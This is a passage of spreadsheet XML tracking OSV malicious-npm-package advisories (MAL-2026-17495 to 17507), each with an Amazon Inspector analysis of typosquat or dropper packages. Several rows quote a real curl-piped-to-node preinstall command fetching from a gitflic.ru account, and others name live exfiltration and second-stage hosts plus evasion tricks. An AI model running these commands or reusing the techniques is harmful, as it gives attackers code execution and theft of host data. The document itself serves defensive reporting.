          <t>OSV</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr"/>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)
The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on `npm install`, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.
</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17495</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17496</t>
        </is>
      </c>
      <c r="D153" s="5" t="inlineStr"/>
      <c r="E153" s="5" t="inlineStr"/>
      <c r="F153" s="5" t="inlineStr"/>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr">
        <is>
          <t>npm:@angulra/core</t>
        </is>
      </c>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr"/>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34)
The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at `npm install` time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name `@angulra/core` resembles Angular ecosystem names while the package description (`Core Libs`) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running `npm install` on this package executes arbitrary remote code with the installing user's privileges.
</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17496</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17497</t>
        </is>
      </c>
      <c r="D154" s="5" t="inlineStr"/>
      <c r="E154" s="5" t="inlineStr"/>
      <c r="F154" s="5" t="inlineStr"/>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr">
        <is>
          <t>npm:@babell/core</t>
        </is>
      </c>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr"/>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ae256b9ff55b98040ea9cb6561edfe1c4e2db94bd111fb19a449651bd6b5d44b)
The package's package.json defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading a JavaScript file from a third-party host (gitflic.ru/hellscripter, fetched through web.archive.org) and piping it directly into Node for execution at install time. The content fetched is unpinned, served from a non-publisher host unrelated to Babel, and executed with the privileges of the installing user. The package name `@babell/core` differs from the legitimate `@babel/core` by a single character, and its description, author, repository, homepage, and README all impersonate the real Babel project, serving as a delivery vehicle for the dropper.
</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17497</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17498</t>
        </is>
      </c>
      <c r="D155" s="5" t="inlineStr"/>
      <c r="E155" s="5" t="inlineStr"/>
      <c r="F155" s="5" t="inlineStr"/>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr">
        <is>
          <t>npm:@kibt/www-nuxt-i18n</t>
        </is>
      </c>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr"/>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5ab1895c73507311b9efd31e40015529d9d7735c87e50cf3b714e6e520205ec4)
The package is a stub whose index.js exports a Proxy returning no-op functions for every property access, allowing bundlers that import any member of the expected real package to succeed. The package.json declares a postinstall script `node beacon.cjs`, and index.js also loads the same beacon at require() time. beacon.cjs collects installer host metadata — os.hostname(), the install directory (__dirname), process.cwd(), and process.version — and POSTs it to the hardcoded plain-HTTP bare-IP endpoint http://185.158.107.175:8787/_ah/dc. The destination is not affiliated with any legitimate publisher, the package provides no real functionality, and an in-source comment frames successful installs as evidence of a hit — matching the canonical dependency-confusion / namesquat validator shape where host identity is reported back to the operator to confirm which internal environments resolved the attacker-controlled scoped name.
</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17498</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17499</t>
        </is>
      </c>
      <c r="D156" s="5" t="inlineStr"/>
      <c r="E156" s="5" t="inlineStr"/>
      <c r="F156" s="5" t="inlineStr"/>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr">
        <is>
          <t>npm:@nagular/core</t>
        </is>
      </c>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr"/>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557)
The package's package.json declares a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from an unrelated third-party host (gitflic.ru proxied through web.archive.org) and piping it directly to node for execution during `npm install`. The remote content runs with the installer's privileges before any package code is imported or reviewed, giving whoever controls that URL arbitrary code execution on every machine that installs the package. The remote path `hellscripter/install-scripts` and the use of an archive proxy are consistent with a hostile dropper rather than a legitimate build step. The scope name `@nagular/core` additionally resembles the Angular ecosystem (`@angular`), consistent with a typosquat lure, and the preinstall hook is the package's only functional content.
</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17500</t>
        </is>
      </c>
      <c r="D157" s="5" t="inlineStr"/>
      <c r="E157" s="5" t="inlineStr"/>
      <c r="F157" s="5" t="inlineStr"/>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr">
        <is>
          <t>npm:@nagular/router</t>
        </is>
      </c>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr"/>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca)
package.json declares a preinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at `npm install` time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope `@nagular/router`, a name likely to be confused with `@angular/router`, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.
</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17500</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17501</t>
        </is>
      </c>
      <c r="D158" s="5" t="inlineStr"/>
      <c r="E158" s="5" t="inlineStr"/>
      <c r="F158" s="5" t="inlineStr"/>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr">
        <is>
          <t>npm:a11y-tabindex-manager</t>
        </is>
      </c>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr"/>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ce127c3e1cadd4f544a5f2580f2db030e3d9e3667d7b0e3399d85b59eb354045)
a11y-tabindex-manager ships thunderboltRegistry.js, which executes an IIFE on module load that runs a series of local shell commands (cat /etc/hosts, whoami, id, pwd, ifconfig/ip addr, hostname, cat /etc/resolv.conf, uname -a, env | head -50) via child_process.execSync and POSTs each output over plain HTTP to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. A separate beacon labeled 'rce-poc-v3' sends Node.js version, platform, and PID to the same host. child_process is acquired both directly and via a fallback that instantiates a new Module (new module.constructor()) and copies module.paths — an evasion technique to bypass simple require('child_process') scans. The package name resembles a generic accessibility helper, but the shipped registry entry performs host identity, network configuration, user, and environment-variable harvesting with no legitimate purpose.
</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17501</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17502</t>
        </is>
      </c>
      <c r="D159" s="5" t="inlineStr"/>
      <c r="E159" s="5" t="inlineStr"/>
      <c r="F159" s="5" t="inlineStr"/>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>npm:botmaker-cli</t>
        </is>
      </c>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr"/>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (86fdc86c67d202ca9938942ef7786534d1b72169187cce13b1cefd8899fa54aa)
On npm install, postinstall.js collects the installer's hostname, username, current working directory, architecture, platform, and network interface list (including private IPs) and POSTs them as JSON to the hardcoded host telemetry-edge.net at /api/v1/telemetry over HTTPS with certificate validation disabled (rejectUnauthorized: false). The same postinstall script reads the HTTP response body, parses it as JSON, and passes the response's `exec` field to child_process.execSync with a 30-second timeout, granting whoever controls telemetry-edge.net arbitrary shell command execution as the installing user on every machine that runs `npm install`. The package's index.js is an inert stub containing only `module.exports = { version: '0.1.19' }` and a comment directing users to a different scoped package (`@botmaker.org/botmaker-cli`), indicating this unscoped name is a lookalike lure whose sole operative payload is the install-time beacon-and-exec channel.
</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17502</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17503</t>
        </is>
      </c>
      <c r="D160" s="5" t="inlineStr"/>
      <c r="E160" s="5" t="inlineStr"/>
      <c r="F160" s="5" t="inlineStr"/>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr">
        <is>
          <t>npm:dom-focus-sentinel</t>
        </is>
      </c>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr"/>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7baf5178b3cd02ae8e6e2c01e8cf305fd9670118428c4d3ef94ac0caef6fc4e8)
thunderboltRegistry.js runs an immediately-invoked function at module load that uses child_process.execSync to run host reconnaissance commands (whoami, id, pwd, ifconfig, ip addr, cat /etc/hosts, hostname) and transmits each command's output, along with Node version, platform, and pid, via fetch GET requests to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package also structurally impersonates Wix internal registry modules by exporting factories keyed on thunderboltRegistry/siteAssetsRegistry/documentManagementRegistry/editorRegistry/corvidRegistry and shipping a manifest with static.parastorage.com unpkg URLs under dom-focus-sentinel@1.0.0, so the exfiltration IIFE fires whenever a consumer requires any of these registry names. The reconnaissance behavior is unrelated to the declared focus-sentinel purpose, and a `beacon=rce-poc` marker is embedded in the exfil traffic.
</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17503</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17504</t>
        </is>
      </c>
      <c r="D161" s="5" t="inlineStr"/>
      <c r="E161" s="5" t="inlineStr"/>
      <c r="F161" s="5" t="inlineStr"/>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-async</t>
        </is>
      </c>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr"/>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (51d22963a1f1fabe3a8b3f54efcb5053761d385486093200765745297ac2bd16)
The package impersonates the dotenv API but on module load (and again when the bundled CLI runs) invokes a function named dispatchAnalytics in dist/index.cjs that extracts a payload from the APP14 (0xFFED) marker of dist/stest.jpg. The extracted UTF-16LE base64 string is assembled into a VBS file (relay_&lt;time&gt;&lt;rand&gt;.vbs) in the OS temp directory that invokes powershell.exe with -NoProfile -NonInteractive -EncodedCommand, spawned via wscript.exe in detached, windowsHide mode. The decoded PowerShell downloads a second-stage Windows executable from hardwood-studio-obviously-briefing.trycloudflare.com/download/winhost and executes it, giving arbitrary code execution on Windows installers. String-splitting of powershell/wscript and argument tokens is used to evade static matching. A second obfuscated execution vehicle is shipped in dist/enterprise.js: a hex-named obfuscator.io-style loader that RC4-decrypts a base64 blob and executes it via new Function(require, module, __filename, __dirname, &lt;decoded&gt;); this file is not referenced by index.cjs in the current build but is a dormant secondary stage in the tarball. Identity inconsistencies corroborate intent: cli.cjs bundles an inner package.json declaring name node-env-buffer version 2.2.6 while the outer manifest is dotenv-async 1.0.0, and the README points at the unrelated motdotla/dotenv project.
</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17504</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17505</t>
        </is>
      </c>
      <c r="D162" s="5" t="inlineStr"/>
      <c r="E162" s="5" t="inlineStr"/>
      <c r="F162" s="5" t="inlineStr"/>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-promises</t>
        </is>
      </c>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr"/>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (254f0bcbb8014fb07414eb0b41a898deac682aa8c8b7a8541a0f7538ac274f9a)
The package is published as 'dotenv-promises' but its bundled manifest declares the internal name 'node-env-buffer@2.2.6' and mimics the dotenv API (config/parse/populate/expand) to attract installs of a well-known library. On require of the main entry (dist/index.cjs) and on load of the CLI (dist/cli.cjs), a top-level call to dispatchAnalytics() reads a bundled JPEG at dist/stest.jpg, extracts bytes from the image's APP13 (marker 0xED) segment, writes a randomized 'relay_*.vbs' script into the OS temp directory that invokes powershell.exe with -NoProfile -NonInteractive -EncodedCommand using the extracted string as the payload, and spawns wscript.exe detached with windowsHide:true to run the VBS hidden; the VBS self-deletes after execution. Strings such as 'powershell.exe', 'wscript.exe', '-NoProfile', and '-EncodedCommand' are split and concatenated at runtime to evade static scanners, and a second bundle (dist/enterprise.js) is heavily obfuscated (string-array shift, while(!![]) control-flow flattening). No signature or hash check is performed on the JPEG-embedded payload, giving the publisher arbitrary code execution on any Windows host that installs or imports the package.
</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17505</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17506</t>
        </is>
      </c>
      <c r="D163" s="5" t="inlineStr"/>
      <c r="E163" s="5" t="inlineStr"/>
      <c r="F163" s="5" t="inlineStr"/>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-ftp</t>
        </is>
      </c>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr"/>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5e916c23a0efbd49d3cfcd5993957df7afbade3f454925d0672acc8c9f68245c)
The package's declared main entry index.js unconditionally requires./lib/config, a 4,499,968-byte obfuscator.io-packed file (26,234-entry string array, hex-renamed identifiers, control-flow flattening, top-level IIFE) that executes as soon as any consumer runs `require('hardhat-ftp')`. After string-array decoding the loader resolves to execSync and spawn sinks, and the package declares axios as a dependency, giving the import-time payload both outbound HTTP and local command-execution primitives with the concrete command targets concealed behind the obfuscation. The surrounding package is a cover: it is published under the name hardhat-ftp with a vulnerability-management description, but the README headers, badges, and ecosystem links are lifted from pinojs/pino, and the files under lib/ (proto.js, levels.js, transport.js, multistream.js) mirror the pino source tree. The name/README/code mismatch, the scale of the obfuscation, and the presence of exec+HTTP primitives inside the auto-loaded module match the masquerade-dropper pattern: installing or requiring this package triggers execution of concealed attacker-controlled code on the installer's host.
</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17506</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17507</t>
        </is>
      </c>
      <c r="D164" s="5" t="inlineStr"/>
      <c r="E164" s="5" t="inlineStr"/>
      <c r="F164" s="5" t="inlineStr"/>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-jsx</t>
        </is>
      </c>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr"/>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (62ac44be2745338b73861690e7f979216fdfc6c3797dfa2f450e9063aa4158d1)
The package is published as 'hardhat-jsx' but its metadata, documentation, and lib/ layout impersonate the pino logger (keywords 'fast','logger','stream','json'; shipped docs reference pinojs/pino). The main entry index.js unconditionally requires./lib/config, which is a 4,499,968-byte single-line obfuscator.io artifact — a hex-escaped string array of ~26,234 entries with string-array rotation and control-flow flattening (22,707 decoder-wrapper inlines, 44,499 string-inline changes). A legitimate pino 'config' module is ~1-2KB; a multi-megabyte obfuscated blob auto-loaded by the main entry is a loader/dropper. The surface index.js exports a no-op Express-style middleware whose comment claims it 'triggers a background process', providing a cover story adjacent to the obfuscated require. Loading the package via require/import executes the opaque payload in the installer's process. The name/content mismatch (hardhat-jsx vs. pino impersonation), the stub façade, and the heavily obfuscated auto-loaded module together form a trojan-package shape.
</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17507</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17508</t>
        </is>
      </c>
      <c r="D165" s="5" t="inlineStr"/>
      <c r="E165" s="5" t="inlineStr"/>
